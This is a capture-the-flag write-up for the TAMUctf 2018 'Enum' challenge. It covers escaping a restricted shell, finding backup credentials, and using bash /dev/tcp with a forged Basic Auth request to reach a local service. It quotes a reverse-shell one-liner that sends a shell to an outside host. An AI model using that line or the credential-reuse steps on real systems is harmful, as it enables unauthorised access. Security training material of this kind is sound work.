Enum

TAMUctf 2018 - MISC (150 pts).

TAMUctf 2018: Enum

Event Challenge Category Points Solves
TAMUctf 2018 Enum Miscellaneous 150 ?

Description

Find the hidden flag.

ssh tamuctf@shell2.ctf.tamu.edu -p 2222

password: tamuctf

TL;DR

For this challenge ssh credentials were given, the goal is to find the hidden flag. We first found a file containing credentials. Then a server running on port 9000. Since we don’t have tool to connect to it (netcat, telnet…), we used built-in socket to communicate with it using the credentials and get the flag.

Enumeration

When you arrive on the server, the shell is restricted, it is a rbash. To get out of it, we use directly the bash command which is available.

After a little research, we find an interesting file: /var/backups/.srv.bak

Our lazy IT guy hasn't set up our apache server yet, so we have to use some weird snake-server in the meantime.
Save this file as a backup for the credentials.

uname: administrator
passwd: dcVMOlH5e6Hd1LGHXLmWzFhjqMu2/nIP9CXt23aq2CE

So we have credentials to connect to a snake-server, we immediately think of a python server. When listing processes, we find an interesting one:

0.0 0.0 37988 12360 ? S Feb16 0:06 /usr/bin/python /.administrators/pyserver.py 9000

After a quick netstat, a process is listening on port 9000.

It is now necessary to succeed in interacting with him, knowing that there is no tool in the machine to do it (netcat, telnet…). We try to access to it from the outside, but the port is filtered.

Find a way to communicate

By looking on how to communicate with the server, I’m thinking back to this reverse shell:

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

After searching about that, I finally find https://www.linuxjournal.com/content/more-using-bashs-built-devtcp-file-tcpip

Which gives us:

exec 3<>/dev/tcp/127.0.0.1/9000
echo "GET / HTTP/1.1" 1>&3
cat <&3

HTTP/1.0 401 Unauthorized
Server: SimpleHTTP/0.6 Python/2.7.12
Date: Sun, 18 Feb 2018 14:04:00 GMT
WWW-Authenticate: Basic realm="Test"
Content-type: text/html

no auth header received

There is a basic authentication on the service, so we base64’ize the credentials recovered during the enumeration:

administrator:dcVMOlH5e6Hd1LGHXLmWzFhjqMu2/nIP9CXt23aq2CE
YWRtaW5pc3RyYXRvcjpkY1ZNT2xINWU2SGQxTEdIWExtV3pGaGpxTXUyL25JUDlDWHQyM2FxMkNF

Then we forge the http request to authenticate:

exec 3<>/dev/tcp/127.0.0.1/9000
echo -e "GET / HTTP/1.1\r\nhost: 127.0.0.1\r\nAuthorization: Basic YWRtaW5pc3RyYXRvcjpkY1ZNT2xINWU2SGQxTEdIWExtV3pGaGpxTXUyL25JUDlDWHQyM2FxMkNF\r\nConnection: close\r\n\r\n" >&3
cat <&3

Flag

The flag was gigem{pivot_piv0t_P1V0T_20975430987aff92qf89qf}

DrStache